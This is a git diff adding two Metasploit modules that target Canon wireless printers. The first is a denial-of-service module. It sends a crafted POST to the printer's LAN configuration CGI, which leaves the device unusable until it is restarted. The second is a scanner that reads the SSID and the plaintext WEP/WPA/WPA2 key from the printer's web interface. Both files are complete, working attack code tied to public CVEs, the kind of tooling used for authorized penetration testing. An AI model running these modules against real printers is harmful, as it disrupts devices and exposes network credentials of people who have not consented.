diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb new file mode 100644 index 0000000000..13fe138c53 --- /dev/null +++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb @@ -0,0 +1,93 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Canon Wireless Printer Denial Of Service', + 'Description' => %q{ + The HTTP management interface on several models of Canon Wireless printers + allows for a Denial of Service condition via a crafted HTTP request. This + requires the device to be turned off and back on again to restore use. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "hostess" Andreko ' + ], + 'References' => [ + [ 'CVE', '2013-4615' ], + [ 'URL', 'http://www.mattandreko.com/2013/06/canon-y-u-no-security.html'] + ], + 'DisclosureDate' => 'Jun 18 2013')) + end + + def is_alive? + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/', + },10) + + return !res.nil? + end + + def run + + begin + + # The first request will set the new IP + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/English/pages_MacUS/cgi_lan.cgi', + 'data' => 'OK.x=61' + + '&OK.y=12' + + '&LAN_OPT1=2' + + '&LAN_TXT1=Wireless' + + '&LAN_OPT3=1' + + '&LAN_TXT21=192' + + '&LAN_TXT22=168' + + '&LAN_TXT23=1' + + '&LAN_TXT24=114">' + + '&LAN_TXT31=255' + + '&LAN_TXT32=255' + + '&LAN_TXT33=255' + + '&LAN_TXT34=0' + + '&LAN_TXT41=192' + + '&LAN_TXT42=168' + + '&LAN_TXT43=1' + + '&LAN_TXT44=1' + + '&LAN_OPT2=4' + + '&LAN_OPT4=1' + + '&LAN_HID1=1' + }) + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE + print_error("Couldn't connect to #{rhost}:#{rport}") + return + end + + # The second request will load the network options page, which seems to trigger the DoS + send_request_cgi({ + 'method' => 'GET', + 'uri' => '/English/pages_MacUS/lan_set_content.html' + },5) #default timeout, we don't care about the response + + # Check to see if it worked or not + if is_alive? + print_error("#{rhost}:#{rport} - Server is still alive") + else + print_good("#{rhost}:#{rport} - Connection Refused: Success!") + end + + end +end diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb new file mode 100644 index 0000000000..0e9b26b667 --- /dev/null +++ b/modules/auxiliary/scanner/http/canon_wireless.rb @@ -0,0 +1,149 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'nokogiri' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Canon Printer Wireless Configuration Disclosure', + 'Description' => %q{ + This module enumerates wireless credentials from Canon printers with a web interface. + It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870, + MX890, MX920. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "hostess" Andreko ' + ], + 'References' => [ + [ 'CVE', '2013-4614' ], + [ 'URL', 'http://www.mattandreko.com/2013/06/canon-y-u-no-security.html'] + ], + 'DisclosureDate' => 'Jun 18 2013')) + end + + def get_network_settings + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/English/pages_MacUS/lan_set_content.html', + }) + rescue + print_error("#{rhost}:#{rport} Could not connect.") + return + end + + if res + if res.code == 200 + + html = Nokogiri::HTML(res.body) + + checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]' + + if checked_lan_setting.count == 1 + lan_setting = '' + ssid = '' + case checked_lan_setting[0]['value'] + when '0' + lan_setting = 'Do not use LAN' + when '1' + lan_setting = 'Use wired LAN' + when '2' + lan_setting = 'Use wireless LAN' + + ssid_input = html.xpath '//input[@name="LAN_TXT1"]' + ssid = ssid_input[0]['value'] if ssid_input.count == 1 + end + + return lan_setting, ssid + else + print_error("#{rhost}:#{rport} Could not determine LAN Settings.") + end + + elsif res.code == 401 + print_error("#{rhost}:#{rport} Authentication failed") + elsif res.code == 404 + print_error("#{rhost}:#{rport} File not found") + end + end + end + + def get_wireless_key + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/English/pages_MacUS/wls_set_content.html", + }) + rescue + print_error("#{ip}:#{rport} Could not connect.") + return + end + + if res + if res.code == 200 + html = Nokogiri::HTML(res.body) + encryption_setting = '' + encryption_key = '' + + checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]' + case checked_encryption_setting[0]['value'] + when '0' + encryption_setting = 'None' + when '1' + encryption_setting = 'WEP' + wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]' + encryption_key = wep_key_inputs.collect{|x| x['value']}.join(', ') + when '2' + encryption_setting = 'WPA' + wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]' + encryption_key = wpa_key_input[0]['value'] + when '3' + encryption_setting = 'WPA2' + wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]' + encryption_key = wpa2_key_input[0]['value'] + end + + return encryption_setting, encryption_key + + elsif res.code == 401 + print_error("#{rhost}:#{rport} Authentication failed") + elsif res.code == 404 + print_error("#{rhost}:#{rport} File not found") + end + end + end + + def run_host(ip) + + ns = get_network_settings + return if ns.nil? + + good_string = "#{rhost}:#{rport} Option: #{ns[0]}" + if ns[0] == 'Use wireless LAN' + wireless_key = get_wireless_key + good_string += "\tSSID: #{ns[1]}\tEncryption Type: #{wireless_key[0]}\tKey: #{wireless_key[1]}" + end + + report_note({ + :data => good_string, + :type => 'canon.wireless', + :host => ip, + :port => rport + }) + + print_good good_string + + end +end